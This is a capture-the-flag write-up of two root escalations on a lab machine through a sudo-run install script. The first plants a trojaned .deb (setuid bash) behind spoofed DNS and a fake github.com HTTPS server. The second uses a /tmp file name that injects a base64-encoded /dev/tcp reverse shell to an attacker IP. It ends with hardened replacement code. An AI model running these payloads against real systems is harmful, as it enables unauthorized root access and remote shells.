Privilege escalation
0
dingtom@DingTom:~$ sudo -l
Matching Defaults entries for dingtom on DingTom:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dingtom may run the following commands on DingTom:
(root) NOPASSWD: /opt/install.sh
dingtom@DingTom:~$ sudo /opt/install.sh
╔═╗╦ ╦╔═╗╔═╗╔╦╗
╠═╣║ ║║ ╦║╣ ║
╩ ╩╚═╝╚═╝╚═╝ ╩
[✦] 量子系统初始化中...
▰▰▰▰▰▰▰▰▰▰ 100%
╒════════════════════════════╕
🚀 赛博更新协议已激活 │
╘════════════════════════════╛
2025-05-03 12:28:16 |_/> 时空锚点已记录
[ 系统自检 ]
- 扫描第8维度协议...
⚠ 警告:即将进入超频更新模式
按任意键启动曲速引擎...
--2025-05-03 12:28:27-- https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
Resolving github.com (github.com)... 192.168.20.33, 2a03:2880:f10a:83:face:b00c:0:25de
Connecting to github.com (github.com)|192.168.20.33|:443... failed: Connection refused.
Connecting to github.com (github.com)|2a03:2880:f10a:83:face:b00c:0:25de|:443... failed: Network is unreachable.
dpkg-deb: error: '/opt/stegseek.deb' is not a Debian format archive
dpkg: error processing archive /opt/stegseek.deb (--install):
dpkg-deb --control subprocess returned error exit status 2
Errors were encountered while processing:
/opt/stegseek.deb
☄ 时空裂隙开启中...
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ 超维度传输协议启动 50%
╔════════════════════════════╗
🚨 检测到高能粒子流! ║
╚════════════════════════════╝
2025-05-03 12:28:29 ◈─≺≻─◈ 正在量子纠缠以下文件:
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
☯ [文件本体] /etc/hosts → /tmp/hosts.quantum
'/etc/hosts' -> '/tmp/hosts.quantum'
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
☯ [文件本体] /var/log/syslog → /tmp/syslog.quantum
'/var/log/syslog' -> '/tmp/syslog.quantum'
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
☯ [文件本体] /root/.bashrc → /tmp/.bashrc.quantum
'/root/.bashrc' -> '/tmp/.bashrc.quantum'
[✔] 时空连续性校验:
-rw-r--r-- 1 root root 570 May 3 12:28 /tmp/.bashrc.quantum
-rw-r----- 1 root root 55K May 3 12:28 /tmp/syslog.quantum
-rw-r--r-- 1 root root 186 May 3 12:28 /tmp/hosts.quantum
💥💥💥 时空折叠已完成!
当前/tmp目录星图:
★ /tmp/hosts.quantum
★ /tmp/syslog.quantum
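1 The group owner's approach (cool cool cool)
Build a .deb package that carries out the privilege escalation when dpkg installs it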
sudo gem install fpm
TF=$(mktemp -d)
echo 'exec chmod +s /bin/bash' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
mv x_1.0_all.deb stegseek_0.6-1.deb
HTTPS server installation and configuration
(1) Certificate
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /tmp/github.key -out /tmp/github.crt
or
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /tmp/github.com.key -out /tmp/github.com.crt -subj "/CN=github.com"
mkdir -p RickdeJager/stegseek/releases/download/v0.6/
cp stegseek_0.6-1.deb .
(2) Server configuration file
sudo apt install nginx
sudo vim /etc/nginx/sites-available/github
server {
listen 443 ssl;
server_name github.com;
ssl_certificate /tmp/github.com.crt;
ssl_certificate_key /tmp/github.com.key;
root /tmp;
location / {
autoindex on;
}
}
sudo ln -s /etc/nginx/sites-available/github /etc/nginx/sites-enabled/
DNS server
Have the target set its DNS server to the DNS server running on the attacker's machine
Then configure the resolution record
sudo apt-get install dnsmasq
sudo vim /etc/dnsmasq.conf
or
echo "address=/github.com/192.168.20.33" | sudo tee -a /etc/dnsmasq.conf
sudo systemctl start dnsmasq.service
dingtom@DingTom:~$ busybox nslookup github.com
Server: 192.168.20.33
Address: 192.168.20.33:53
Name: github.com
Address: 192.168.20.33
Non-authoritative answer:
Name: github.com
Address: 2a03:2880:f10a:83:face:b00c:0:25d
dingtom@DingTom:~$ wget --no-check-certificate https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
--2025-05-03 12:55:17-- https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
Resolving github.com (github.com)... 192.168.20.33, 2a03:2880:f102:183:face:b00c:0:25de
Connecting to github.com (github.com)|192.168.20.33|:443... connected.
WARNING: The certificate of ‘github.com’ is not trusted.
WARNING: The certificate of ‘github.com’ doesn't have a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 1066 (1.0K) [application/octet-stream]
Saving to: ‘stegseek_0.6-1.deb’
stegseek_0.6-1.deb 100%[===========================================================>] 1.04K --.-KB/s in 0s
2025-05-03 12:55:17 (9.44 MB/s) - ‘stegseek_0.6-1.deb’ saved [1066/1066]
dingtom@DingTom:~$ sudo /opt/install.sh
╔═╗╦ ╦╔═╗╔═╗╔╦╗
╠═╣║ ║║ ╦║╣ ║
╩ ╩╚═╝╚═╝╚═╝ ╩
[✦] 量子系统初始化中...
▰▰▰▰▰▰▰▰▰▰ 100%
╒════════════════════════════╕
🚀 赛博更新协议已激活 │
╘════════════════════════════╛
2025-05-03 12:57:10 |_/> 时空锚点已记录
[ 系统自检 ]
- 扫描第8维度协议...
⚠ 警告:即将进入超频更新模式
按任意键启动曲速引擎...
--2025-05-03 12:57:14-- https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
Resolving github.com (github.com)... 192.168.20.33, 2a03:2880:f102:183:face:b00c:0:25de
Connecting to github.com (github.com)|192.168.20.33|:443... connected.
WARNING: The certificate of ‘github.com’ is not trusted.
WARNING: The certificate of ‘github.com’ doesn't have a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 1066 (1.0K) [application/octet-stream]
Saving to: ‘/opt/stegseek.deb’
/opt/stegseek.deb 100%[===========================================================>] 1.04K --.-KB/s in 0s
2025-05-03 12:57:14 (17.8 MB/s) - ‘/opt/stegseek.deb’ saved [1066/1066]
Selecting previously unselected package x.
(Reading database ... 53043 files and directories currently installed.)
Preparing to unpack /opt/stegseek.deb ...
Unpacking x (1.0) ...
Setting up x (1.0) ...
/bin/bash -p
cat /root/root.txt
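The weakness this approach relies on is that install.sh fetches the package with wget --no-check-certificate and hands whatever arrives straight to dpkg as root, so the spoofed DNS answer and self-signed certificate are accepted. The following is an added example (not part of the original post or of the target's script) of the same step with certificate validation left on and a pinned digest checked before installation; DEB_SHA256 is a placeholder and the function names are assumptions.

```bash
#!/bin/bash
# Added example: the download-and-install step of install.sh with integrity checks.

DEB_URL='https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb'
# Placeholder (assumption): digest of a trusted copy, obtained out of band.
DEB_SHA256='<sha256-of-trusted-stegseek_0.6-1.deb>'

# verify_sha256 FILE EXPECTED: succeed only if FILE hashes to EXPECTED.
verify_sha256() {
    local actual
    actual=$(sha256sum "$1" 2>/dev/null | cut -d' ' -f1)
    [ -n "$actual" ] && [ "$actual" = "$2" ]
}

# install_verified: wget keeps certificate validation on (no
# --no-check-certificate), writes into a fresh 0700 directory instead of a
# fixed path, and dpkg runs only when the pinned digest matches.
install_verified() {
    local tmp rc=1
    tmp=$(mktemp -d) || return 1
    if wget -q -O "$tmp/pkg.deb" "$DEB_URL" &&
       verify_sha256 "$tmp/pkg.deb" "$DEB_SHA256"; then
        dpkg -i "$tmp/pkg.deb"; rc=$?
    else
        echo "download or digest check failed, nothing installed" >&2
    fi
    rm -rf "$tmp"
    return "$rc"
}

# Constructed check: pin the digest of one file, then swap its content the way
# a spoofed server would. Returns 0 when the swap is detected.
demo_swap_detected() {
    local f pinned rc=1
    f=$(mktemp) || return 2
    printf 'trusted package bytes\n' > "$f"
    pinned=$(sha256sum "$f" | cut -d' ' -f1)
    if verify_sha256 "$f" "$pinned"; then
        printf 'substituted package bytes\n' > "$f"
        verify_sha256 "$f" "$pinned" || rc=0
    fi
    rm -f "$f"
    return "$rc"
}

if [ "${1:-}" = "--demo" ]; then demo_swap_detected && echo "swap detected"; fi
```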
2 hyh's approach (cool x5)
a
./pspy64
2025/05/03 11:07:45 CMD: UID=0 PID=1423 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1424 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1425 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1426 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1427 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1428 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1429 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1430 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1431 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1433 | /bin/bash /opt/install.sh
2025/05/03 11:07:45 CMD: UID=0 PID=1432 | /bin/bash /opt/install.sh
2025/05/03 11:07:45 CMD: UID=0 PID=1434 | xargs -I{} bash -c echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1435 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(cat etcshdow).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1436 | xargs -I{} bash -c echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1437 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(cat install.sh).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1438 | xargs -I{} bash -c echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1442 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1441 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1440 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1439 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
b
bash-5.0# cat install.sh
#!/bin/bash
#!/bin/bash
# Rainbow gradient title
printf "\033[38;5;196m╔═╗╦ ╦╔═╗╔═╗╔╦╗\033[0m\n"
printf "\033[38;5;202m╠═╣║ ║║ ╦║╣ ║ \033[0m\n"
printf "\033[38;5;226m╩ ╩╚═╝╚═╝╚═╝ ╩ \033[0m\n"
# Animated particle loading bar
echo -e "\n\033[1;35m[✦] 量子系统初始化中..."
for i in {1..5}; do
echo -ne "\033[1;36m▰▰▰▰▰▰▰▰▰▰ $((i*20))% \r"
sleep 0.3
done
# Hologram-style info panel
echo -e "\n\033[38;5;87m╒════════════════════════════╕"
echo -e "│ \033[3D\033[5m\033[1m🚀 赛博更新协议已激活\033[0m\033[38;5;87m │"
echo -e "╘════════════════════════════╛\033[0m"
# Matrix-style time display
echo -e "\n\033[32m$(date +'%Y-%m-%d %H:%M:%S') \033[36m|_/\033[5m>\033[0m 时空锚点已记录"
# Spinning radar scan
echo -e "\n\033[33m[ 系统自检 ]"
spin='-\|/'
for i in {1..8}; do
printf "\r${spin:i%4:1} 扫描第${i}维度协议..."
sleep 0.2
done
# Interstellar navigation prompt
echo -e "\n\n\033[1;31m⚠ 警告:即将进入超频更新模式"
echo -e "\033[35m按任意键启动曲速引擎...\033[0m"
read -n 1 -s
wget --no-check-certificate https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb -O /opt/stegseek.deb
dpkg -i /opt/stegseek.deb
rm /opt/stegseek.deb
#!/bin/bash
# Big Bang progress bar
echo -e "\n\033[38;5;201m☄ 时空裂隙开启中..."
for i in {1..5}; do
printf "\033[48;5;$((i*40))m\033[38;5;0m▉%.0s\033[0m" {1..20}
echo -ne " 超维度传输协议启动 ${i}0% \r"
sleep 0.3
done
# Interstellar navigation notice board
echo -e "\n\033[1;33m╔════════════════════════════╗"
echo -e "║ \033[5m\033[3D🚨 检测到高能粒子流!\033[0m\033[1;33m ║"
echo -e "╚════════════════════════════╝\033[0m"
# Random file selector (with quantum-fluctuation effect)
echo -e "\n\033[36m$(date +'%Y-%m-%d %H:%M:%S') \033[35m◈─≺≻─◈\033[0m 正在量子纠缠以下文件:"
files=("/etc/hosts" "/var/log/syslog" "$HOME/.bashrc")
for f in "${files[@]}"; do
echo -ne "\033[38;5;$((RANDOM%255))m"
echo "▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓"
echo -e "\033[3D☯ [文件本体] $f \033[5m→\033[0m \033[1;31m/tmp/${f##*/}.quantum\033[0m"
cp -v "$f" "/tmp/${f##*/}.quantum" 2>/dev/null || echo "❌ 维度震荡导致复制失败!"
sleep 0.5
done
# Holographic verification system
echo -e "\n\033[48;5;21m\033[1;37m[✔] 时空连续性校验:\033[0m"
find /tmp -maxdepth 1 -name "*.quantum" -exec ls -lh {} \; 2>/dev/null |
while read -r line; do
echo -e "\033[38;5;$((RANDOM%255))m${line//G/GB✨}\033[0m"
done
# Supernova-style completion notice
echo -e "\n\033[48;5;196m\033[1;33m💥💥💥 时空折叠已完成!\033[0m"
echo -e "\033[38;5;226m当前/tmp目录星图:"
ls /tmp/*.quantum 2>/dev/null |
xargs -I{} bash -c 'echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"'
c
ls /tmp/*.quantum 2>/dev/null |xargs -I{} bash -c 'echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"'
┌──(kali㉿kali)-[/tmp]
└─$ echo -e "aabb$(id)fsdsfaaaaf"
aabbuid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),106(bluetooth),113(scanner),136(wireshark),137(kaboxer)fsdsfaaaaf
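Create a file in /tmp whose name is the command to execute; xargs pastes the name into the bash -c string, so the root-run script evaluates it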
dingtom@DingTom:/tmp$ touch '$(echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg=="|base64 -d | bash).quantum'
dingtom@DingTom:/tmp$ sudo /opt/install.sh
rlwrap nc -lvp 1234
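The root cause in step c is that xargs -I{} pastes each file name from the world-writable /tmp into the text of a bash -c script, where $(...) is evaluated as root. The following is an added example (not part of the original post or of the target's script) showing two injection-safe ways to produce the same listing; the function names are assumptions, and the demo uses a harmless constructed marker command in the file name.

```bash
#!/bin/bash
# Added example: injection-safe replacements for the final listing in install.sh.

# Safe variant 1: no child shell at all. The glob result is only ever a
# printf argument, so "$(...)" inside a file name is printed, not evaluated.
list_quantum() {
    local dir=$1 f
    for f in "$dir"/*.quantum; do
        [ -f "$f" ] || continue          # also skips the unmatched glob
        printf '\033[38;5;%dm★ %s \033[0m\n' "$((RANDOM % 255))" "$f"
    done
}

# Safe variant 2: keep xargs + bash -c, but hand the name over as the
# positional parameter $1 instead of pasting {} into the script text.
list_quantum_xargs() {
    find "$1" -maxdepth 1 -type f -name '*.quantum' -print0 |
        xargs -0 -I{} bash -c \
            'printf "\033[38;5;%dm★ %s \033[0m\n" "$((RANDOM % 255))" "$1"' _ {}
}

# Constructed check: a harmless marker command stands in for a payload.
# Returns 0 when neither variant executed the command in the file name.
demo() {
    local d rc=0
    d=$(mktemp -d) || return 2
    ( cd "$d" && touch '$(touch INJECTED).quantum' 'hosts.quantum' )
    ( cd "$d" && list_quantum "$d" && list_quantum_xargs "$d" )
    [ -e "$d/INJECTED" ] && rc=1
    rm -rf "$d"
    return "$rc"
}

if [ "${1:-}" = "--demo" ]; then demo; fi
```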